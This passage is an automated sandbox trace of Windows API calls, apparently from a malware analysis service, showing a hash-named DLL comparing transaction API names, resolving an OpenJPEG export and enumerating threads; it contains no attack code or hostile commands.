(lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.321] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0253.322] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.322] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0253.322] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0253.322] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0253.322] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0253.322] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0253.322] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0253.322] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0253.322] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0253.322] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.323] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0253.324] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0253.324] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0253.324] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0253.325] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0253.533] GetProcessHeap () returned 0x4e0000 [0253.534] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d25030 | out: hHeap=0x4e0000) returned 1 [0253.542] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0253.542] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0253.544] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1000) returned 0x2d25030 [0253.545] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x26) returned 0x4e87e0 [0253.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_get_cstr_index", cchWideChar=-1, lpMultiByteStr=0x4e87e0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_get_cstr_index", lpUsedDefaultChar=0x0) returned 19 [0253.545] GetLastError () returned 0x0 [0253.545] SetLastError (dwErrCode=0x0) [0253.545] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_cstr_indexW") returned 0x0 [0253.546] GetLastError () returned 0x7f [0253.546] SetLastError (dwErrCode=0x7f) [0253.546] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_cstr_indexA") returned 0x0 [0253.546] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_cstr_index") returned 0x7ffc45f1a8d0 [0253.546] GetActiveWindow () returned 0x0 [0253.547] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d25030 | out: hHeap=0x4e0000) returned 1 [0253.547] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e87e0 | out: hHeap=0x4e0000) returned 1 [0253.547] GetCurrentProcessId () returned 0x60 [0253.547] GetCurrentThreadId () returned 0xed8 [0253.547] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0253.557] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0253.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.333] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 